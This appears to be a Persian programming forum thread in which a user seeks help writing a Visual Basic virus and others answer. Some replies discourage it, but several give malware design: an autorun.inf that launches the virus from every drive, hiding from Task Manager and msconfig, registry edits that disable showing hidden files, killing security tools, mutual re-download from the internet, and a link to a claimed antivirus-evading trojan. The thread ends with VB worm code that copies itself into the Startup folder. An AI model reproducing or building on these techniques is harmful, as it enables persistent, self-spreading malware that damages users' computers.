سلام من می خوام اولین ویروسم رو به زبان ویبی طراحی کنم اما می خواستم قبلش از شما دوستان که در این ضمینه تجربتون از من بیشتره بپرسم.به نظرتون ویروس من چه مشخصاتی داشته باشه که کامل وقوی باشه

به نظر من كه بی خيال ويروس شو. برو يه چيز به درد بخور بنويس نه يه ويروس دردسر ساز.

ببنید دوستان من باز هم میگم نه قصد تکثیر ویروس رو دارم نه میخوام با اون معروف بشم فقط به خاطر علاقم به شیوه ی برنامه نویسی و عملکرد این نوع کدهاست همین
اینم که این تاپیک رو باز کردم فقط به این خاطر بود که بدونم یه ویروس قوی از نظر شما چیه همینو بس

من ویروس رو پیشنهاد نمی کنم ولی برای معروف شدن خوبه (در صورتی که فرد زیاد ناراحت نشه مثل این که درایو d پاک بشه) .
نظر من اینه که اول چند تا ویروس بنویس بعد یه برنامه ای بنویس که مورد نیاز مردم است .

خوب دوستان من الان می خوام فایل ویروسم بعد از اجرا بلافاصله Hidden یا پاک بشه وبقیه کاراشو انجام بده؟
چه کار باید انجام بدم ممنون جواب بدین

سلام

درسته شاید نیت بدی نداشته باشی ولی گوش کن

من هم خودم یک بار یه ویروسی نوشتم که :شیطان: خیلی نامرد و بدجنس بود تمامی راه گریز رو بستم به همه جای درایوهات به داخل تمامی پوشه هات همه و همه جا پخش میشد

ولی بعداز تموم شدن که آماده فرستادن به بازار بود :کف: :متفکر: دیدم به جز لعنت فرستادن و ناسزا گفتن پشت سرت و خانوادت چیزی به بر نداره پسر خوب آخه این همه کار میتونی بکنی میخوایی ویروس بنویسی که بعد مثل من پاک کنی بی خیال شو

خوب دوستان من الان می خوام فایل ویروسم بعد از اجرا بلافاصله Hidden یا پاک بشه وبقیه کاراشو انجام بده؟
چه کار باید انجام بدم ممنون جواب بدین

توي Form_load
بنويس
me.hide

موفق نباشي
چون فقط خواستم جواب سوالت رو بدم

نظر من اینه که اول چند تا ویروس بنویس بعد یه برنامه ای بنویس که مورد نیاز مردم است .
سلام.
من هم با این نظر موافقم:تشویق:
دوست عزیز Morpheus (http://barnamenevis.org/forum/member.php?u=80248) شما هم برای شروع میتونی ویروس نویسی کنی.:لبخند:لازم هم نیست که ویروس های خطرناک بنویسی ویروس های جالب بنویس:متفکر:برای رسیدن به جواب سوالت هم به اینجا یه نگاه بنداز http://barnamenevis.org/forum/showthread.php?t=125082
من خودم ویروس های زیادی نوشتم:کف:میتونم کمکت کنم. اگه دوست داشتی آیدی منو add کن. hamid_sos3
البته قصد جصارت ندارم ولی تو این فروم دنبال ویروس نگرد چون بحث درمورد کد های مخرب و اینجور چیزا خلاف قوانین سایت هست:ناراحت::گریه:

موفق باشی:لبخند:

ببخشید فکر کنم منظور از hidden شدن اینم بود که فایل برنامه hidden بشه نه فرم برنامه . این کد بدردت می خوره.

ببنید دوستان من باز هم میگم نه قصد تکثیر ویروس رو دارم نه میخوام با اون معروف بشم فقط به خاطر علاقم به شیوه ی برنامه نویسی و عملکرد این نوع کدهاست همین
اینم که این تاپیک رو باز کردم فقط به این خاطر بود که بدونم یه ویروس قوی از نظر شما چیه همینو بس

من هم با نظرت موافقم . آدم اول باید از خونه ی خودش دزدی کنه تا بفهمه دزد ها از چه راهایی می تونن از خونش دزدی کنن تا اون را ها رو برای دزد ها ببنده .
ویروس های جدید خودشان را داخل درایو ها کپی می کنند و یک فایل inf هم با نام autorun داخل درایو ها میگذارند و داخل آن جملات زیر را می نویسند


[autorun]
open=autoplay.exe
shell\open=open
shell\open\Command=autoplay.exe
shell\open\Default=1
shell\explore=explore
shell\explore\Command=autoplay.exe

(به جای autoplay می توانید نام ویروس خود را بگذارید )
تا هر بار که درایو را با کلیک روی آن باز می کنیم ویروس اجرا شود . و یک فایل هم در پوشه ی windows کپی می کنند و آن را اجرا می کنند و داخل آن می نویسند که خود را در task manager مخفی کند و هر 10 ثانیه یک بار درایو ها رو چک کند که ویروس در آن پاک شده یا نه و اگر پاک شده بود آن را دوباره کپی کند . بعد کاری می کنند که ویروس مثل برنامه های عادی بدون استفاده از start up بالا بیاید . این ساختار پایه ی یک ویروس بود . بقیش هم هر شیطونیی دلت خواست توش بنویس که مثلا title صفحات در حال اجرا در ویندوز را اسم خودت قرار بده و از این جور چیز ها :شیطان:. با تشکر

ببخشید فکر کنم منظور از hidden شدن اینم بود که فایل برنامه hidden بشه نه فرم برنامه . این کد بدردت می خوره.
والا فایل اجرایی که به صورت نمونه بود که ران تایم اررور داد اون کدی هم که گذاشته بودین رو استفاده کردم متاسفانه جواب نداد.
در مورد حرفای دوستان ممنون از نظراتتون حق با شما دوستانه.
اگر یکی دوباره لطف کنه بگه چطوری میشه که فایل برنامه پس از اجرا هیدن یا پاک بشه من ممنون میشم.:لبخند:
اینم بپرسم تا فراموش نکردم
من می خوام یه سری دستورات داس رو تو وی بی استفاده کنم از یه جا دیدم که این دستور بود اما افاقه نکرد


چگونه می توانیم دستورات Dos را از طریق ویژوال بیسیک اجرا کنیم ؟
ابتدا Command Prompt را فراخوانی می کنیم , خوب برای فراخوانی از تابع Shell استفاده میکنیم که قبلا در مورد این تابع توضیح داده ام :

Shell "cmd.exe"

:: اکنون یک شیء ایجاد می کنیم تا بتوانیم از طیق آن به هسته Dos دسترسی داشته باشیم :

Dim WinShell
Set WinShell = CreateObject("Wscript.shell")

خوب حالا می توانید به راحتی هر دستوری که دارید میتوانید اجرا کنید در آخر هم دستور تابع Sendkeys کلید Enter را اجرا کرده و دستور اجرا میشود:

WinShell.SendKeys " Dos دستور مورد نظر برای اجرا در "
WinShell.SendKeys "{ENTER}"

به مثاهای زیر توجه کنید که به ترتیب اولی برای ایجاد پوشه ای به نام Visual Basic در درایو C و دستور دوم برای نمایش پوشه های موجود در درایو C و دستور سوم برای Format فلاپی دیسک می باشد .

'For Create Folder With Dos Prompt :
WinShell.SendKeys "MD C:\Visual" & " Basic"
WinShell.SendKeys "{ENTER}"

'For Showing C Directory :
WinShell.SendKeys "Dir C:\"
WinShell.SendKeys "{ENTER}"

'For Format Floppy Disk Of Dos :
WinShell.SendKeys "format A:"
WinShell.SendKeys "{ENTER}"

هرکی از دوستان میدونه مطرح کنه ممنون میشم

بیا داداشی برو حالشو ببر:
http://www.v-basic.mihanblog.com/post/category/2

نظر یادت نره

والا فایل اجرایی که به صورت نمونه بود که ران تایم اررور داد اون کدی هم که گذاشته بودین رو استفاده کردم متاسفانه جواب نداد.
در مورد حرفای دوستان ممنون از نظراتتون حق با شما دوستانه.
اگر یکی دوباره لطف کنه بگه چطوری میشه که فایل برنامه پس از اجرا هیدن یا پاک بشه من ممنون میشم.:لبخند:
اینم بپرسم تا فراموش نکردم
من می خوام یه سری دستورات داس رو تو وی بی استفاده کنم از یه جا دیدم که این دستور بود اما افاقه نکرد

هرکی از دوستان میدونه مطرح کنه ممنون میشم
ممنون دوست عزیز اما کاش جواب سوالی که مطرح کرده بودم توش بود
:بوس:

یک سوال دیگه از دوستان چطوری میشه مسیر فایل اجرایی که تو استارت آپ ویندوز قرار میگیره رو مخفی کرد که با مراجعه به Msconfig نتوان اونو در استارت آپ پیدا کرد؟

کسی بلد نبود لطف کنه جواب بده؟

کسی بلد نبود لطف کنه جواب بده؟
دوست عزیز اگر کسی بلد نباشه که نمی تونه جواب بده ! :قهقهه: . خوب حالا بگذریم . ما میتونیم لیست نرم افزار هایی را که بدون استفاده از فولدر starup بالا می آیند را در اینجا ببینیم . تو باید ویروست را اونجا بگذاری .
start > ControlPanel > administrative tools > Services
حالا دیگه چه جوریشو نمی دونم :لبخند:. با تشکر

خوب دوستان من الان می خوام فایل ویروسم بعد از اجرا بلافاصله Hidden یا پاک بشه وبقیه کاراشو انجام بده؟
چه کار باید انجام بدم ممنون جواب بدین

امیدوارم این سورس به دردتون بخوره! اولاً Macke ِش کن بعد اجرا کن! (بعد از اجرا می بینی که خوده فایل exe، حذف میشه)

http://barnamenevis.org/forum/attachment.php?attachmentid=20670&d=1216447340

ولی کلاً ویروس نویسی رو بزار کنار! واقعاً بهت حال میده؟ :متفکر: بیخیال بابا :لبخند:!

با تشکر مجدد از دوست عزیز آقا رضای گل ممنون
دوستان من چند فروم دیگه هم سرچ کردم اما به نتیجه ی مورد نظرم نرسیدم کسی می دونه چطور میشه از دستورات داس به طور کامل تو وی بی بهره برد بدون این که بخوایم دستوری رو مستقیم تو داس بنویسیم یا داس رو محیطشو فراخونی کنیم.(منظور کلیم اینه که دستور مستقیم برای استفاده از دستورات داس هست)

اینم هدیه من به شما یک ویروس بسیار بسیار خطرناک و هوشمند :قهقهه::قلب:


http://rapidshare.com/files/161405841/Kernel32.zip.html

دوستان شاید فکر کنن بسیار بسیار خطرناک یعنی

فرمت کردن یک درایو خاص

پاک کردن Folder Option

دیده نشدن فایل های Hidden

از کار انداختن رجیستری و تسک منجر و ....

ریستارت های پی در پی

و ....

ولی من به شما قول شرف میدم که هیچ یک از کارهای بالا را انجام نمیدهد. وقتی ویروس اجرا می شود . هیچی نمی شود ؟؟؟ پیدا کنید ویروس چه کار می کند ؟؟ !!! :شیطان::چشمک::قهقهه:

این ویروسی که نوشتم توسط Nod32 و Anti Vira تست شده و این انتی ویروس ها نتوانستن ویروس را شناسایی کنن

عواقب ناشی از اجرای ویروس در سیستم بر عهده من نیست. گفتم که گفته باشم . ( اگر ناشی هستی دست نزن )

حداقل با آنتی ویروسهای قوی تر مثل کاسپر اسکای و ... اسکن می کردی:لبخند:

Virus: TR/Crypt.FKM.Gen
Type: Trojan
In the wild: Yes
Reported Infections: Low
Distribution Potential: Low
Damage Potential: Low

البته کاسپر گیر میده ولی اگر یه بار اجرا بشه کاسپر هم هیچ غلطی نمی تونه بکنه. از ترست به محض دانلود اسکن کردی ؟؟؟

با سلام . می خواستم طرز کار یک ویروس وحشتناک پاک نشدنی که به ذهنم رسید را بگم :شیطان: . کار های عادی این ویروس که مثل ویروس های دیگر است عبارت است از : autorun سازی در درایو ها و فلش دیسک ها . مخفی شدن در تسک منیجر . تغییر در رجیسری : تغییر checked value در فلدر ShowAll از 1 به 0 (در این صورت هر بار در folderoption گزینه ی show hidden files and folders را بزنیم تاثیری نخواهد داشت ) . hidden کردن ویروس مان قبل از کپی کردن آن داخل درایو ها . داخل ویروس بنویسم که اگر app.path ویروسی که اجرا شده صفحه ی اول درایو بود کاری کند که آن درایو به صورت عادی در همان صفحه باز شود و در لیست پروسس ها چک کند که اگر ویروس در حال اجرا است اول یک دور همه چیز را چک کند و در صورت وجود کامل ویروس در همه جا خود را ببندد و در غیر این صورت کار های لازمه را انجام دهد و خود را هم نبندد . پنجره های باز را چک کند که اگر اسم آنها System Configuration Utility یا services یا شبیه این ها بود آن ها را ببندد .
و اما خواص غیر عادی این ویروس : در form1_unload دو بار بنویسیم که ویروس را اجرا کند این به دلیل این است که برنامه های دیگری هم می توانند برنامه ی ما را خاتمه دهند و وقتی ویروس در هر بار خاتمه یافتن دوبار اجرا شود کاربر کلا بی خیال خاتمه دادن آن می شود . خواص دوم آن یک فایل کمکی است که ویروس آن را از internet برای محافظت از خودش دانلود می کند . این فایل فقط چک می کند که ویروس در کامپیوتر وجود دارد یا نه و اگر وجود نداشت آن را اینترنت دانلود می کند و اجرا می کند و به این صورت این دو فایل از هم محافظت می کنند و به قول معروف هوای همدیگر را دارند . این فایل کمکی باید در جایی قرار بگیر و هر بار اجرا شود که کاربر نتواند آن را پیدا کند ولی حتی اگر کاربر آن را پیدا کرد و از بین برد اولا باید آن را قبلا چند جای دیگر کپی کرده باشیم که در صورت از بین رفتن ویروس اصلی آن را پیدا کند ودیگر در محل های لو رفته آن را کپی نکند و دوم اگر تمام آن ها از بین رفت ویروس اصلی دوباره آن را از اینترنت دانلود کند و اجرا کند:شیطان: . با تشکر .

این همه خودتو کشتی ؟ این ویروس در عرض 1 دقیقه به طور کامل از سیستم پاک می شود

بوسیله نرم افزار های Process Exolorer و Autoruns

در نرم افزار پروسس اکسپلورر قدرتی هست که علاوه براینکه شما کارهای بالا را انجام بدی و ویروست پروسس پدر و فرزندی هم داشته باشه . باز هم می تونه اونو ببنده

با سلام . دوست عزیز ما فقط کافیه اسم پنجره و محل نصب این جور نرم افزار ها یی که انقدر به قول شما قدرت مندند را بدانیم تا پوست از سرشان بکنیم یعنی اول با دونستن اسم پنجره اون را خاتمه بدیم (حتی اگر اسم پنجره هم به صورت random عوض شود باز هم راه هایی برای شناسایی آن هست و فقط کافی که اون نرم افزار را روی کامپیوتر خودمان نصب کنیم و عکس العمل های آن را تست کنیم ) و بدش کل ایل و تبارش را از کامپیوتر پاک کنیم و حتی دفعه ی بعدی که کاربر خواست آن را نصب کند تا صفحه ی install اون برنامه شناسایی شد آن را می بندیم و eject سی دی خوان را می زنیم و پیغام می دهیم که یک ویروس توسط windows xp در این سی دی پیدا شده و از این جور چیز ها :لبخند:. البته من این ها را نمی گم که قصد اذیت کسی را توسط این ویروس داشته باشم . من فقط می خواهم بگویم که بعضی از ویروس ها راه مقابله ای ندارند و تنها کاری که می توانیم انجام دهیم این است که windows را پاک کنیم :چشمک:. با تشکر .

دوست عزیز آقایSyntiberium ممنون از الگوریتم هایی که برای ساخت ویروس قدرتمند ارایه دادین. سعی می کنم از تمام ایه هاتو استفاده کنم.

نرم افزاری که من اشاره کردم به نصب نیازی نداره و Caption برنامه در کامپیوتر های متفاوت مختلف است

و پرتابل هست و همه جا و فقط با یه کلیک اجرا میشه.

در ضمن برنامه هایی که پروسس های ویندوز را مدیریت می کنن بسیار زیاد هستند

شما در این صورت باید بانک بزرگی از لیست این برنامه ها را داشته باشی

اگر هم شما بانک داشته باشی

من یه برنامه می نویسم که تمامی پروسس ها بجز چند تا پروسس اصلی را ببنده.

بعد از این کار مسیر ویروس را با نرم افزار AutoRuns پیدا می کنم . و همون جا شیفت دلت میزنم

دوستان عزیز Debugger وSyntiberium به نظرم بهتره کل کل در مورد این موضوع رو بیخیال بشین چون ممکنه به این خاطر یه موقع تاپیک قفل بشه منم که چند بار سوال مطرح کردم تو این تاپیک پاسخی نگرفتم
ممنون

با سلام . دوست عزیز من به قول آقای Morpheus قصد کل کل با شما را ندارم ولی برنامه ای که شما می نویسید نمی تواند ویروس را یک دفعه خاتمه دهد و این در صورتی است که ما داخل ویروس نوشته ایم قبل خارج شدن دو بار خودش را اجرا کند که در اینصورت دردسر کاربر در صورت خاتمه دادن مثلا چهار ویروس در یک زمان (یعنی اگر ویروس چهار بار اجرا شده باشد و کاربر با یک برنامه هر چهار تا را یکباره خاتمه دهد ) 8 برابر خواهد شد :عصبانی++:. با تشکر .

دوستان کد زیر رو ببینید:

Private Sub Form_Load()
On Error Resume Next
If App.PrevInstance = True Then End
If Len (Dir$("C:\WINDOWS\Start Menu\Programs\StartUp\Syst" & _
"em File.exe")) = 0 Then
FileCopy WormFile, "C:\WINDOWS\Start Menu\Programs\Star" & _
"tUp\System File.exe"
End If
If App.Path = "A:\" Or App.Path = "B:\" Then
Unload Me
End If
End Sub
تو این خط زیر syntax error میده نمیدونم کجاشه اگر کمک کنین ممنون میشم

If Len (Dir$("C:\WINDOWS\Start Menu\Programs\StartUp\Syst" & _
"em File.exe")) = 0 Then
:لبخندساده: